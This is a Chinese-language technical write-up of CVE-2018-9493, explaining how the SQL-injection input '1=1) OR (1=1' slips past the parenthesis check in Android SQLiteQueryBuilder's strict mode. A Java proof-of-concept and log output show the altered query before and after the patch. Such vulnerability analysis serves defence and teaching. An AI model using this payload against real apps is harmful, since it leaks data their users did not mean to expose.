SQLiteQueryBuilder 与 CVE-2018-9493
安全隐患(SQL注入导致数据泄露):http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9493
SQLiteQueryBuilder是Android中用来构建复杂查询SQL的类,在开启安全检查(android.database.sqlite.SQLiteQueryBuilder.setStrict())后会对SQL的Where条件添加额外的“()”以防止恶意SQL注入。
其工作的思路很简单,用加了额外“()”的SQL来编译(prepare()),如果编译顺利(没有语法错),就接着编译、执行原始SQL以获取数据结果。
但是这个思路有个缺陷,如果攻击者有机会恶意拼接Where条件,用类似“1=1) OR (1=1”这样的输入,因为输入中也包含了“()”,可以让开启setStrict后的两种SQL均编译顺利通过,但是Where条件的含义却被篡改了。
验证程序:
private void testQueryBuilder() { Log.i(TAG,"Begin testQueryBuilder..."); android.database.sqlite.SQLiteDatabase adb = android.database.sqlite.SQLiteDatabase.openOrCreateDatabase("/data/data/just.justdbdemo/t.db", null); android.database.sqlite.SQLiteQueryBuilder sqb = new android.database.sqlite.SQLiteQueryBuilder(); sqb.setTables("sqlite_master"); sqb.setStrict(true); sqb.appendWhere("sql !='sql'"); Cursor csr = sqb.query(adb, new String[]{"name, sql"}, "1=1) OR (1=1", null, null, null, null); Log.i(TAG, "csr.getCount() = " + csr.getCount()); csr.close(); adb.close(); Log.i(TAG,"End of testQueryBuilder..."); }
输出结果:
android.database.sqlite.SQLiteQueryBuilder.setStrict(false); 01-07 13:25:25.465: D/SQLiteConnection(1149): prepare took 1ms - succeeded, sql="SELECT name, sql FROM sqlite_master WHERE (sql !='sql') AND (1=1) OR (1=1)" 01-07 13:25:25.475: D/SQLiteConnection(1149): executeForCursorWindow took 2ms - succeeded, sql="SELECT name, sql FROM sqlite_master WHERE (sql !='sql') AND (1=1) OR (1=1)", window='/data/data/just.justdbdemo/t.db {2a150a58}', startPos=0, actualPos=0, filledRows=1, countedRows=1 01-07 13:25:25.475: I/Just DB test(1149): csr.getCount() = 1
----------------------------------------------------------------------------------------------------- android.database.sqlite.SQLiteQueryBuilder.setStrict(true); 01-07 13:27:06.645: D/SQLiteConnection(1199): prepare took 1ms - succeeded, sql="SELECT name, sql FROM sqlite_master WHERE (sql !='sql') AND ((1=1) OR (1=1))" 01-07 13:27:06.645: D/SQLiteConnection(1199): prepare took 3ms - succeeded, sql="SELECT name, sql FROM sqlite_master WHERE (sql !='sql') AND (1=1) OR (1=1)" 01-07 13:27:06.655: D/SQLiteConnection(1199): executeForCursorWindow took 1ms - succeeded, sql="SELECT name, sql FROM sqlite_master WHERE (sql !='sql') AND (1=1) OR (1=1)", window='/data/data/just.justdbdemo/t.db {2a147798}', startPos=0, actualPos=0, filledRows=1, countedRows=1 01-07 13:27:06.655: I/Just DB test(1199): csr.getCount() = 1 打上补丁之后 01-07 13:28:30.135: D/SQLiteConnection(1199): prepare took 1ms - succeeded, sql="SELECT name, sql FROM sqlite_master WHERE (sql !='sql') AND ((1=1) OR (1=1))" 01-07 13:28:30.165: D/SQLiteConnection(1199): prepare took 2ms - succeeded, sql="SELECT name, sql FROM sqlite_master WHERE (sql !='sql') AND (1=1) OR (1=1)" 01-07 13:28:30.195: D/SQLiteConnection(1199): executeForCursorWindow took 1ms - succeeded, sql="SELECT name, sql FROM sqlite_master WHERE (sql !='sql') AND ((1=1) OR (1=1))", window='/data/data/just.justdbdemo/t.db {2a155a58}', startPos=0, actualPos=0, filledRows=0, countedRows=0 01-07 13:28:30.195: I/Just DB test(1199): csr.getCount() = 0